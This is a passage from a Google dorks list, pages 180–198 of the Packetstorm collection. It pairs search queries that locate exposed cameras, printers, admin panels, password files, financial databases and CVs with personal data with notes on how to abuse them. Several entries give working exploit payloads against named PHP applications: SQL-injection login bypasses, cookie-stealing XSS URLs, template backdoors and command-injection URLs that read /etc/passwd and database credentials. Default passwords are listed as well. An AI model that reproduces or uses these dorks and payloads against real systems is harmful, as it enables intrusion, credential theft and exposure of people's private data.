intext:"Powered by flatnuke-2.5.3"+"Get RSS News" -demo

Description of VulnerabilitiesMultiplevulnerabilities in FlatNuke have beenreported, which can be exploited byremote users to trigger denial of serviceconditions, execute arbitrary PHP code,conduct Cross-Site Scripting attacksand disclose arbitrary images andsystem information.If the"/flatnuke/foot_news.php" script isaccessed directly a while() call is madethat enters an infinite loop, leading tofull CPU utilisation.[..]User-suppliedinput passed to the "image" parameterin the "thumb.php" script is notcorrectly validated. This can beexploited to disclose arbitrary imagesfrom external and local resources viadirectory traversal attacks, or todisclose the installation path.It is alsopossible to disclose the system path byaccessing certain scripts directly orspecially formed parameters.

inurl:pass.dat filetype:dat inurl:pass.dat

Accesses passwords mostly in cgibinbut not all the timeCan find passwords+ usernames (sometimes username),some unecrypted some not

intext:"Welcometo" inurl:"cp"intitle:"H-

intext:"Welcome to" inurl:"cp"intitle:"H-SPHERE"inurl:"begin.html" -Fee

This gives results for hosting plans thatdon't have associated fees, so anyonecan sign up with false information and

Page 180: Packetstorm Google Dorks List

SPHERE"inurl:"begin.html"-Fee

no credit card details

intitle:"phpinfo()"+"mysql.default_password" +"ZendScriptingLanguage Engine"

intitle:"phpinfo()"+"mysql.default_password" +"ZendScripting Language Engine"

This will look throught default phpinfopages for ones that have a defaultmysql password.

intitle:"configuration" inurl:port_0 intitle:"configuration" inurl:port_0 More dell and lexmark printers, The

usual things included.intitle:"Dell LaserPrinter M5200"port_0

intitle:"Dell Laser Printer M5200"port_0 Dell Laser Printer M5200

printers/printman.html printers/printman.html

some interesting information on printerstatus including Name, Location,Model, Pagecount, Action, Status. Thissummary page also presents severalprinters in one list, and the status logsreveal more sensitive information likeemail addresses.

"RICOH NetworkPrinter D model-Restore Factory"

"RICOH Network Printer D model-Restore Factory" Not a whole lot here.

intitle:"GCCWebAdmin" -gcc.ru

intitle:"GCC WebAdmin" -gcc.ru All sorts of various printer statusinformation

intitle:"XMailWebAdministrationInterface"intext:Loginintext:password

intitle:"XMail Web AdministrationInterface" intext:Loginintext:password

This search will find the WebAdministration Interface for serversrunning XMail."XMail is an Internetand intranet mail server featuring anSMTP server, POP3 server, fingerserver, multiple domains, no need forusers to have a real system account,SMTP relay checking", etc...

intitle:"AXIS 240Camera Server"intext:"serverpush" -help

intitle:"AXIS 240 Camera Server"intext:"server push" -help

This search finds AXIS 240 CameraServers (as opposed to just thecameras) which can host manycameras, that may not be found in othersearches, since they are not necessarilyIP based.

"html allowed"guestbook "html allowed" guestbook

When this is typed in google it findswebsites which have HTML Enabledguestbooks. This is really stupid as

Page 181: Packetstorm Google Dorks List

users could totally mess up theirguestbook by adding commands like oradding a loop javascript pop-up

intext:"PoweredBy: Snitz Forums2000 Version3.4.00..03"

intext:"Powered By: Snitz Forums2000 Version 3.4.00..03"

snitz Forum 2000 v 3.4.03 and older isvulnerable to many things includingXSS. Seehttp://www.gulftech.org/?node=research&article_id=00012-06162003. This isa sketchy search, finding vulnerableversions 3.4.00-3.4.03. Older versionsare vulnerable as well.

filetype:QBW qbw filetype:QBW qbw

Quickbooks is software to manage yourbusiness's financials. Invoicing,banking, payroll, etc, etc. Its a nicesoftware package but their files (.qbw)are simply password protected in mostcases and online programs may beavailable to remove passwordprotection. SSNs (depending on thecompany), account numbers ofemployees for direct deposit, customerlists, etc may be available. This couldlead to identity theft, or worse...

inurl:cgi-bininurl:calendar.cfg inurl:cgi-bin inurl:calendar.cfg

CGI Calendar (Perl) configuration filereveals information includingpasswords for the program.

inurl:"/login.asp?folder=" "Poweredby: i-Gallery 3.3"

inurl:"/login.asp?folder=" "Poweredby: i-Gallery 3.3"

i-Gallery 3.3 (and possibly older) isvulnerable to many things, including/../traversals.http://www.packetstormsecurity.org/0506-exploits/igallery33.txt

intitle:"Login toCacti" intitle:"Login to Cacti"

Cacti is a complete network graphingsolution designed to harness the powerof RRDTool's data storage andgraphing functionality.

"set up theadministrator user"inurl:pivot

"set up the administrator user"inurl:pivot

Using this, you can find sites with aPivot weblog installed but not set up.The default set up screen on Pivot hasyou create an administrator account, so,using this, you can create an accounton someone else's weblog, post, andmanage the blog.

inurl:textpattern/index.php inurl:textpattern/index.php Login portal for textpattern a

CMS/Blogger tool.

Page 182: Packetstorm Google Dorks List

tilt intitle:"LiveView / - AXIS" |inurl:view/view.shtml

tilt intitle:"Live View / - AXIS" |inurl:view/view.shtml

A small modification to the AXIScamera search - it now returns cameraswith pan / tilt, which is much more fun!

"powered byPhpBB 2.0.15" -site:phpbb.com

"powered by PhpBB 2.0.15" -site:phpbb.com

Another php vulnerabilty, as seen herehttp://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.phpphpBB 2.0.15Viewtopic.PHP Remote CodeExecution VulnerabilityThis exploitgives the user all the details about thedatabaseconnection such as databasehost, username, password anddatabasename.

filetype:PS ps filetype:PS ps

PS is for "postscript"...which basicallymeans you get the high quality pressdata for documents. Just run 'adobedistiller' or alike to produce a readablePDF. Found items include completebooks as sold on amazon, annualreports and even juicier stuff.

"You haverequested access toa restricted area ofour website. Pleaseauthenticateyourself tocontinue."

"You have requested access to arestricted area of our website.Please authenticate yourself tocontinue."

BackgroundEasySite is a ContentManagement System (CMS) build onPHP and MySQL. Many easysiteservers still use the default usernameand password, however all of themhave been contacted about thisproblem.

intitle:"picturesthumbnails"site:pictures.sprintpcs.com

intitle:"pictures thumbnails"site:pictures.sprintpcs.com

This search reveals the photo albumstaken by Sprint PCS customers.Pictures taken with Sprint's cell phoneservice can be shared on their website.This search exposes the thumbnailalbum, only if the user has elected toshare the photo album.Nothing like theParis Hilton pictures, but there arepictures of people drunk at parties,dancing, girlfriens and so on.

allinurl:cdkey.txt allinurl:cdkey.txt cdkeys

intitle:"TANDBERG" "This pagerequires a framecapable browser!"

intitle:"TANDBERG" "This pagerequires a frame capable browser!"

Tandberg is a manufacturer ofvideoconferencing A videoconference(also known as a video teleconference)is a meeting among persons where bothtelephony and closed circuit televisiontechnologies are utilized

Page 183: Packetstorm Google Dorks List

simultaneously.

intitle:"Middleframe ofVideoconferenceManagementSystem" ext:htm

intitle:"Middle frame ofVideoconference ManagementSystem" ext:htm

Tandberg is a manufacturer ofvideoconferencing A videoconference(also known as a video teleconference)is a meeting among persons where bothtelephony and closed circuit televisiontechnologies are utilizedsimultaneously.

intitle:"VeoObserver WebClient"

intitle:"Veo Observer Web Client"

Another online camera search. Thisone uses ActiveX thingies, so you needa M$ browser. Append "LGI_en.htm"to the URL for the english version. Theembedded webserver is calledUbicom/1.1. Defaults areadmin/password. The manual verycleary warns owners to change that.

intitle:"TOPdeskApplicationServer"

intitle:"TOPdeskApplicationServer"

Topdesk is some kind of incident ticketsystem with a webinterface. It requires:Windows 98 and Windows NT,Windows 2000, Windows XP, OS/2. Itinstalls a webserver called: Jetty/4.2.2and the default password (operatorlogin) is admin/admin. The HTTPserver header reveals the OS it'srunning on.

intitle:"Welcometo MailtraqWebMail"

intitle:"Welcome to MailtraqWebMail"

Mailtraq WebMail is just another aweb-based e-mail client. This is thelogin page.

intitle:"JavaApplet Page"inurl:ml

intitle:"Java Applet Page" inurl:ml

Another Standalone NetworkCamera.Default Login: removewg_jwebeye.ml to get a nice clue..Server: wg_httpd/1.0(basedBoa/0.92q)

intitle:"WEBDVR" -inurl:product -inurl:demo

intitle:"WEBDVR" -inurl:product -inurl:demo

DVR is a generic name used todescribe the recording process with adigital cam (digitial video recording).This search finds several manufactorslike Kodicom DVR Systems, i3 DVR,and others I can't identify.

"This section is forAdministratorsonly. If you are anadministrator thenplease"

"This section is for Administratorsonly. If you are an administratorthen please"

Nothing special, just one more set oflogin pages, but the "Administratorsonly" line is a classic.

Page 184: Packetstorm Google Dorks List

intitle:"MemberLogin" "NOTE:Your browsermust have cookiesenabled in order tolog into the site."ext:php OR ext:cgi

intitle:"Member Login" "NOTE:Your browser must have cookiesenabled in order to log into thesite." ext:php OR ext:cgi

Pretty standered login pages, they allhave various differences but it appearsthat they use the same script orsoftware.

site:www.mailinator.cominurl:ShowMail.do

site:www.mailinator.cominurl:ShowMail.do

Mailinator.com allows people to usetemporary email boxes. Read the site, Iwon't explain here. Anyway, there areemails in this site that have nopassword protection and potentiallycontain usernames, passwords, andemail data. The only lock againstunwanted viewers is the email addresswhich can be randomized.

filetype:mdb"standard jet"

filetype:mdb "standard jet"(password | username | user | pass)

These Microsoft Access Database filesmay contain usernames, passwords orsimply prompts for such data.

inurl:"default/login.php"intitle:"kerio"

inurl:"default/login.php"intitle:"kerio"

This dork reveals login pages for KerioMail server. Kerio MailServer is astate-of-the-art groupware serverallowing companies to collaborate viaemail, shared contacts, sharedcalendars and tasks. Download can befound herehttp://www.kerio.com/kms_download.html.

ext:(doc | pdf | xls |txt | ps | rtf | odt |sxw | psw | ppt |pps | xml)(intext:confidentialsalary |intext:"budgetapproved")inurl:confidential

ext:(doc | pdf | xls | txt | ps | rtf | odt |sxw | psw | ppt | pps | xml)(intext:confidential salary |intext:"budget approved")inurl:confidential

Although this search is a bit broken(the file extensions don't always work),it reveals interesting-lookingdocuments which may containpotentially confidential information.

intitle:"V1""welcome tophone settings"password

intitle:"V1" "welcome to phonesettings" password

This is a small search for the ItalkBB899 Phone Adaptor login page.iTalkBB is a local and long distancecalling service provided by iTalkBroadband Corporation. It combinesvoice and internet networks to provideinbound and outbound long distance

Page 185: Packetstorm Google Dorks List

and local calling solutions.Dependingon the version of firmware preinstalledon your IP Box, the password to getinto the setting pages may be either12345678 or 87654321.

intitle:"HPProCurve Switch*" "This productrequires a framecapable browser."

intitle:"HP ProCurve Switch *""This product requi

HP ProCurve Switch web managementpages, found by their [noscript] htmltags. Please note: this search only givesresults from certain source IP addressesand I can't tell you why (check forumtopic number 2609 for details).

"Powered byGravity Board" "Powered by Gravity Board"

4.22 07/08/2005 Gravity Board X v1.1(possibly prior versions) Remote codeexecution, SQL Injection / LoginBypass, cross site scripting, pathdisclosure poc software: author site:http://www.gravityboardx.com/ a) SqlInjection / Login Bypass: Ifmagic_quotes off, A user can bypasslogin check and grant administratorprivileges on target system: login: ' orisnull(1/0) /* password: whatever b)Cross site scripting poc: b.1)After helogin as administrator he can edittemplate to insert evil javascript code.Try to insert at the end of the templatethese lines: alert(document.cookie)b.2)A user can craft a malicious url likethis to access target user cookies:http://[target]/[path]/deletethread.php?board_id=">alert(document.cookie) c)Remote commands/php codeexecution: c.1) Always editing thetemplate, attacker can leave a backdoorin target system, example, at the end oftemplate: After, the attacker can launchcommands by this urls:http://[target]/[path]/index.php?cmd=ls%20-la to list directories...http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix/etc/passwd filehttp://[target]/[path]/index.php?cmd=cat%20config.php to see databaseusername/password c.2) An

Page 186: Packetstorm Google Dorks List

IMPORTANT NOTE: You can edittemplate without to be logged in asadministator, calling editcss.php script,look at the code of this script: if($fp =fopen('gbxfinal.css','w')){ fwrite($fp,$csscontent); fclose($fp); echo '';}else{ echo 'Gravity Board X wasunable to save changes to the CSStemplate.'; } you can easily deface theforum and/or insert a backdoor callingan url like this:http://[target]/[path]/editcss.php?csscontent= then execute commands:http://[target]/[path]/index?cmd=[command] It's also possible to disclosepath: d) path disclosure:http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.phphttp://[target]/[path]/addnews.phphttp://[target]/[path]/banned.phphttp://[target]/[path]/boardstats.phphttp://[target]/[path]/adminform.phphttp://[target]/[path]/forms/admininfo.phphttp://[target]/[path]/forms/announcements.phphttp://[target]/[path]/forms/banform.php ans so on...calling scripts in /formsdirectory

"Powered bySilverNews" "Powered by SilverNews"

silvernews 2.0.3 (possibly previousversions ) SQL Injection / LoginBypass / Remote commands execution/ cross site scripting software: authorsite: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews SQL Injection / Login bypass:A user can bypass admin passwordcheck, if magic_quotes is set to off:user: ' or isnull(1/0) /* pass: whateverremote commands execution: now, newadmin can edit template, clicking onTemplates -> Global footer, can addthe lines://*********************************************** TEMPLATE; } }system($HTTP_GET_VARS[comman

Page 187: Packetstorm Google Dorks List

d]); /* to leave a backdoor in templatefile /templates/tpl_global.php now canlaunch system commands on the targetsystem with theese urls:http://[target]/[path]//templates/tpl_global.php?command=ls%20-la to listdirectorieshttp://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd to see /etc/passwd filehttp://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php to seeMysql database password cross sitescripting: same way, a user can hideevil javascript code in template

PHPFreeNewsinurl:Admin.php PHPFreeNews inurl:Admin.php

29/07/2005 8.36.03PHPFreeNewsVersion 1.32 (& previous) sqlinjection/login bypass, cross sitescripting, path disclosure, informationdisclosure author site:http://www.phpfreenews.co.uk/Main_Intro.phpxsspoc:http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableC

Page 188: Packetstorm Google Dorks List

omments=1&PopupHeight=")}//-->alert(document.cookie)also a user cancraft a url to redirect a victim to an evilsite:http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]pathdisclosure:http://[target]/[path]/inc/ArchiveOldNews.phphttp://[target]/[path]/inc/Categories.phphttp://[target]/[path]/inc/CheckLogout.phphttp://[target]/[path]/inc/CommentsApproval.phphttp://[target]/[path]/inc/Images.phphttp://[target]/[path]/inc/NewsList.phphttp://[target]/[path]/inc/Password.phphttp://[target]/[path]/inc/Post.phphttp://[target]/[path]/inc/PostsApproval.phphttp://[target]/[path]/inc/PurgeOldNews.phphttp://[target]/[path]/inc/SetSticky.phphttp://[target]/[path]/inc/SetVisible.phphttp://[target]/[path]/inc/Statistics.phphttp://[target]/[path]/inc/Template.phphttp://[target]/[path]/inc/UserDefinedCodes.phphttp://[target]/[path]/inc/Users.phpinformationdisclosure:googledork:PHPFreeNewsinurl:Admin.php(with this, you canpassively fingerprint the server, PHP &MySQL version are in Googledescription...because this info areshownwed with non-chalance inadmin.php page ;) )defaultpassword:login: Adminpass:AdminMySQL Injection / LoginBypass in previous versions:login:Adminpassword: ') or isnull(1/0) or('a'='anote: all string, not consider 'or'in1.32 version LoginUsername andLoginPassword vars are addslashed...but, try this: login: whateverpass: //') orisnull(1/0) /* this is definetely patchedin 1.40 version

inurl:nquser.phpfiletype:php inurl:nquser.php filetype:php

Netquery 3.1 remote commandsexecution, cross site scripting,information disclosure poc exploitsoftware: author site:http://www.virtech.org/tools/ a user canexecute command on target system by

Page 189: Packetstorm Google Dorks List

PING panel, if enabled like oftenhappens, using pipe char on input text"Ping IP Address or Host Name",example: | cat /etc/passwd then youwill see plain text password file | pwdto see current path | rm[pwd_output]/logs/nq_log.txt to deletelog file... disclosure of user activity: ifenabled, a user can view clear text logfile through url:http://[target]/[path]/logs/nq_log.txtxss:http://[target]/[path]/submit.php?portnum="/>alert(document.cookie)http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie)http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie)http://[target]/[path]/nqgeoip.php?step=alert(document.cookie)http://[target]/[path]/nqports.php?step=alert(document.cookie)http://[target]/[path]/nqports2.php?step=alert(document.cookie)http://[target]/[path]/nqports2.php?body=alert(document.cookie)http://[target]/[path]/portlist.php?portnum=alert(document.cookie) a user canuse on-line Netquery installations likeproxy servers to launch exploit fromHTTP GET request panel, example:exploiting Phpbb 2.0.15: make a getrequest ofhttp://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command].'&command=cat%20/etc/passwd

"Powered By:Simplicity oFUpload"inurl:download.php |inurl:upload.php

"Powered By: Simplicity oFUpload" inurl:download.php |inurl:upload.php

26/07/2005 16.09.18Simplicity OFUpload 1.3 (possibly prior versons)remote code execution & cross sitescriptingsoftware: author site:http://www.phpsimplicity.com/scripts.php?id=3remote commandsexecution:problem at line 25-30:...//check for language overriding..if(isset($_GET['language'])) $language =

Page 190: Packetstorm Google Dorks List

strtolower($_GET['language']);//nowwe include the languagefilerequire_once("$language.lng");...you can include whatever adding a nullbyte to "language" parametervalue:example:http://localhost:30/simply/download.php?language=upload.php%00you will see upload & downloadpage together :)so you can upload acmd.gif (when you upload a .php file,usually it isrenamed to .html...) filewith this php code inside toexecutecommands:then try thisurl:http://[target]/[path]/download.php?language=cmd.gif%00&command=lstolistdirectorieshttp://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwdto show/etc/passwd filecross site scripting:also,a remote user can supply a speciallycrafted URL to redirect other peopletoan evilpage:http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00googledork:"Powered By:Simplicity oF Upload"

"Powered byFlexPHPNews"inurl:news |inurl:press

"Powered by FlexPHPNews"inurl:news | inurl:press

24/07/2005 2.38.13Flex PHPNews0.0.4 login bypass/ sql injection, crosssite scripting & resource consumptionpoc exploitsoftware:authorsite:http://www.china-on-site.com/flexphpnews/downloads.phpxss / cookiedisclosure:http://[target]/[path]/index.php?front_indextitle=alert(document.cookie)http://[target]/[path]/index.php?front_searchsubmit=">alert(document.cookie)http://[target]/[path]/index.php?front_latestnews=">alert(document.cookie)http://[target]/[path]/news.php?newsid=">alert(document.cookie)http://[target]/[path]/news.php?front_rating=">alert(document.cookie)http://[target]/[path]/news.php?salt=">alert(document.cookie)http://[target]/[path]/news.php?front_le

Page 191: Packetstorm Google Dorks List

tmerateit=">alert(document.cookie)http://[target]/[path]/news.php?front_ratebest=">alert(document.cookie)http://[target]/[path]/news.php?front_ratesubmit=">alert(document.cookie)http://[target]/[path]/news.php?front_searchsubmit=">alert(document.cookie)http://[target]/[path]/search.php?front_searchresult=alert(document.cookie)http://[target]/[path]/search.php?front_searchsubmit=">alert(document.cookie)http://[target]/[path]/catalog.php?front_searchsubmit=">alert(document.cookie)http://[target]/[path]/catalog.php?front_latestnews=">alert(document.cookie)http://[target]/[path]/catalog.php?catalogid=">alert(document.cookie)pathdisclosure:http://[target]/[path]/admin/usercheck.php?logincheck=%00denialof service / resourcesconsumption:http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999($prenumberand $nextnumber are uninitialized finalvalues of a loop...) sql injection /bypass authentication:go to loginpage:http://[target]/[path]/admin/(usually admin if not changed)login as user: 'OR 'a'='aand pass : ' OR 'a'='a boom!you're admin ...the problem is inusercheck.php at line 5:$sql = "selectusername from newsadmin whereusername='$checkuser' andpassword='$checkpass'";you can postalways true statements, like'a'='a'solution: replace $checkuser and$checkpass vars with your usernameand pass, by the moment

"Powered byFunkBoard" "Powered by FunkBoard"

FunkBoard V0.66CF (possibly priorversions) cross site scripting, possibledatabase username/password disclosure& board takeover, possible remotecode execution software: author site:http://www.[path_to_funkboard].co.uk/

Page 192: Packetstorm Google Dorks List

xss:http://[target]/[path_to_funkboard]/editpost.php?fbusername=">alert(document.cookie)http://[target]/[path_to_funkboard]/editpost.php?fbpassword=">alert(document.cookie)http://[target]/[path_to_funkboard]/prefs.php?fbpassword=">alert(document.cookie)http://[target]/[path_to_funkboard]/prefs.php?fbusername=">alert(document.cookie)http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=">alert(document.cookie)http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=">alert(document.cookie)http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=">alert(document.cookie)http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=">alert(document.cookie)http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=">alert(document.cookie)http://[target]/[path_to_funkboard]/profile.php?fbusername=">alert(document.cookie)http://[target]/[path_to_funkboard]/profile.php?fbpassword=">alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?fbusername=">alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?fmail=">alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?www=">alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?icq=">alert(document.cookie)http://[target]/[path_to_funkboard]/regi

Page 193: Packetstorm Google Dorks List

ster.php?yim=">alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?location=">alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?sex=">alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?interebbies=">alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie)http://[target]/[path_to_funkboard]/register.php?aim=">alert(document.cookie) path disclosure:http://[target]/[path_to_funkboard]/images/forums.php database username &password disclosure: during installationis not remembered to delete themysql_install script and the installationdo not delete it, usually:http://[target]/[path]/admin/mysql_install.php orhttp://[target]/[path]/admin/pg_install.php there, a user can see database cleartext username & password ... Then, thescript let the user proceed to the nextpage, where he can reset funkboardadministator username & password.Now the script faults, because sometables exist, etc. So user can go backand setting a new database name forinstallation, guessing among otherinstallations on the server... OnceInstallation succeeded he can set newadmin username e password then loginat this page:http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user canedit templates and append some eviljavascript code. remote code execution:look at this code in mysql_install.php :$infoout = " so, you have a backdooron target system... you can launchcommands by this urls:http://localhost:30/funkboard/info.php?

Page 194: Packetstorm Google Dorks List

command=ls%20-la to list directories...http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see/etc/passwd file

"Summary Viewof Sensors" |"sensorProbe8 v*" | "cameraProbe3.0" -filetype:pdf -filetype:html

"Summary View of Sensors" |"sensorProbe8 v *" | "

sensorProbe is a SNMP enabled andWeb based Environmental MonitoringDevice. The sensors attached to thisdevice can monitor temperature,humidity, water leakage and air flow,etc. It does support other sensors whichcan monitor voltage drop, security,analog and dry contacts. ThesensorProbe monitors your equipment'senvironmental variations, and alertsyou through "Email , SMS or SNMPAlerts in your Network Managementsystem" in advance and prevent anydisaster.

inurl:index.phpfees shoplink.codesmerchantAccount

inurl:index.php fees shop link.codesmerchantAccount

Vulnerability in EPay systemsPHPcodeincludinghttp://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwdadvisory:http://www.cyberlords.net/advisories/cl_epay.txtEPay Pro version2.0 is vulnerable to this issue.

intitle:"adminpanel" +"Poweredby RedKernel"

intitle:"admin panel" +"Powered byRedKernel"

This finds all versions of RedKernelReferer Tracker(stats page) it just givesout some nice info

intitle:phpnews.login intitle:phpnews.login

Vulnerable script auth.php (SQLinjection)--- from rst.void.ru ---Possible scenario of attack:[1] log inadmin panel, using SQL injection[2]upload PHP file through "UploadImages" function(index.php?action=images) and havefun with php shellor edit template(index.php?action=modtemp) and putbackdoor code into it.-------------------------http://www.securityfocus.com/bid/14333/infohttp://rst.void.ru/papers/advisory31.txtThe version number may befound sometimes in error messages.

intitle:"blog intitle:"blog torrent upload" Blog Torrent is free, open-source

Page 195: Packetstorm Google Dorks List

torrent upload" software that provides a way to sharelarge files on yourwebsite.vulnerability: free access to thepasswordfilehttp://[target]/[path_of_blog]/data/newusersadvisory:http://www.securitytracker.com/alerts/2005/Jul/1014449.htmlAll current versions could bevulnerable depending on directorypermissions.

intitle:MyShell1.1.0 build20010923

intitle:MyShell 1.1.0 build20010923

Basicly MyShell is a php program thatallows you to execute commandsremotely on whichever server it'shosted on.

intitle:"NetworkStorage Link forUSB 2.0 Disks"Firmware

http://www.google.com/search?q=intitle:%22Network+Storage+Link+for+USB+2.0+Disks%22+Firmware&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0

Networked USB hard drives (NSLU2).Be sure to disable Google's filter(&filters=0) as that is where they popup. Default password (Linksys) isadmin:admin (just like all the rest). Amajority are locked some are not. Somelogins to the NSLU2 will be a link off awebsite. Enjoy.

intitle:"AlternCDesktop" intitle:"AlternC Desktop" This finds the login page for AlternC

Desktop I dont know what versions.

intitle:"communigate pro * *"intitle:"entrance"

intitle:communigate pro entrance

Just reveals the login for CommunigatePro webmail. A brute force attackcould be attempted. The directory linkfrom this page can in some instances beused to query user information.

"inspanel"intitle:"login" -"cannot" "LoginID" -site:inspediumsoft.com

"inspanel" intitle:"login" -"cannot""Login ID" -site:inspediumsoft.com

This finds all versions of the inspanellogin page.

intitle:iDVR -intitle:"com | net |shop" -inurl:"asp |htm | pdf | html |php | shtml | com |at | cgi | tv"

intitle:iDVR -intitle:"com | net |shop" -inurl:"asp | htm | pdf | html |php | shtml | com | at | cgi | tv"

Online camera. Default login isadministrator and password blank.Video server runs default on port 2000.There is an application DVR Centerthat is used to connect to server andmanage recorded videos.

"HostingAccelerator" intitle:"login"+"Username" -

"HostingAccelerator" intitle:"login"+"Username" -"news" -demo

This will find the login portal forHostingAccelerator ControlPanel Ihave not looked for exploits for these

Page 196: Packetstorm Google Dorks List

"news" -demo so i dont know if their are any. So far ihave seen versions 1.9 2.2 and 2.4found by this dork.

intitle:"INTELLINET" intitle:"IPCameraHomepage"

intitle:"INTELLINET" intitle:"IPCamera Homepage"

This googledork finds INTELLINET ipcameras. They are used to monitorthings and have a web interface. Mostof the pages load with the defaultusername and password of guest. Theuser manual says that the default adminusername/password is admin/admin. Atthe time of posting this googledork had10 results. p.s. This was discovered byjeffball55 and cleaned up by golfo

"Powered byZorum 3.5" "Powered by Zorum 3.5"

Zorum 3.5 remote code execution pocexploitsoftware:description: Zorum is afreely available, open source Web-based forumapplication implemented inPHP. It is available for UNIX, Linux,and any otherplatform that supportsPHP script execution.author site:http://zorum.phpoutsourcing.com/1)remote code execution:vulnerable code,in /gorum/prod.php file:07 $doubleApp= isset($argv[1]); ...14 if( $doubleApp)15 {16 $appDir = $argv[1];17system("mkdir $prodDir/$appDir"); ...auser can execute arbitrary commandsusing pipe char,example:http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-lato listdirectorieshttp://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.phpto see databaseusername/password...http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwdto see /etc/passwd file2) pathdisclosure:http://[target]/zorum/gorum/notification.phphttp://[target]/zorum/user.phphttp://[target]/zorum/attach.phphttp://[target]/zorum/blacklist.phphttp://[target]/zorum/forum.phphttp://[target]/zorum/globalstat.phphttp://[target]/zorum/gorum/trace.phphttp://[target]/zorum/gorum/badwords.phphttp://[target]/zorum/gorum/flood.phpand so

Page 197: Packetstorm Google Dorks List

on...googledork:"Powered by Zorum3.5"rgodsite:http://rgod.altervista.orgmail: retrogodat aliceposta itoriginal advisory:http://rgod.altervista.org/zorum.html

intitle:"xams0.0.0..15 - Login" intitle:"xams 0.0.0..15 - Login"

This is the login for xams it shouldcatch from 0.0.1-0.0.150.0.15 being thelatest version as far as I can see their isonly versions 0.0.13 0.0.14 and 0.0.15

intitle:"curriculumvitae" filetype:doc

intitle:"curriculum vitae"filetype:doc

Hello. 1. It reveals personal datas, oftenprivate addresses, phone numbers, e-mails, how many children one has:).Full curriculum vitae. I tried manyverions of it:inurl:"pl"intitle:"curriculum vitae"filetype:docinurl:"uk"intitle:"curriculum vitae"filetype:docinurl:"nl"intitle:"curriculum vitae" filetype:doc,etc. in order to get nationalresults,alsointitle:"curriculum vitae"ext:(doc | rtf )However filetype:docversion gives the most results. 2. Youcan always do someting with someonephone number, date and place of birth,etc. I placed this string in the forum,but nobody answered me :(.GreetingsphilYps. you have somethingsimilar in your GHDB, butdifferent."Click here for the Googlesearch ==> "phone * * *" "address *""e-mail" intitle:"curriculumvitae"(opens in new window)Added:Thursday, August 19, 2004hits: 24771"

"There seems tohave been aproblem with the"" Please try againby clicking theRefresh button inyour webbrowser."

"There seems to have been aproblem with the" " Please try againby clicking the Refresh button inyour web browser."

search reveals database errors onvbulletin sites. View the page sourceand you can get information about thesql query executed, this can help in allmanner of ways depending on thequery.

inurl:csCreatePro.cgi inurl:csCreatePro.cgi Create Pro logon pages.

Page 198: Packetstorm Google Dorks List

"Powered byFUDForum 2.6" -site:fudforum.org -johnny.ihackstuff

"Powered by FUDForum 2.6" -site:fudforum.org -johnny.ihackstuff

FUDforum is prone to a remotearbitrary PHP file uploadvulnerability.An attacker can merge animage file with a script file and uploadit to an affected server.This issue canfacilitate unauthorized remoteaccess.FUDforum versions prior to2.7.1 are reported to be affected.Currently Symantec cannot confirm ifversion 2.7.1 is affected aswell.Affected versions:2.6.15 _ 2.6.14_ 2.6.132.6.12 _ 2.6.10 _ 2.6.9 _2.6.82.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.32.6.2 _2.6.1 _ 2.6

intitle:"LookingGlass v20040427""When verifyingan URL check oneof those"

intitle:"Looking Glass v20040427""When verifying

Looking Glass v20040427 arbitrarycommands execution / cross sitescripting. description: Looking Glass isa pretty extensive web based networkquerying tool for use on php enabledservers. site: http://de-neef.net/articles.php?id=2&page=1download page: http://de-neef.net/download.php?file=2Read thefull report here:http://rgod.altervista.org/lookingglass.html

contacts ext:wml contacts ext:wml

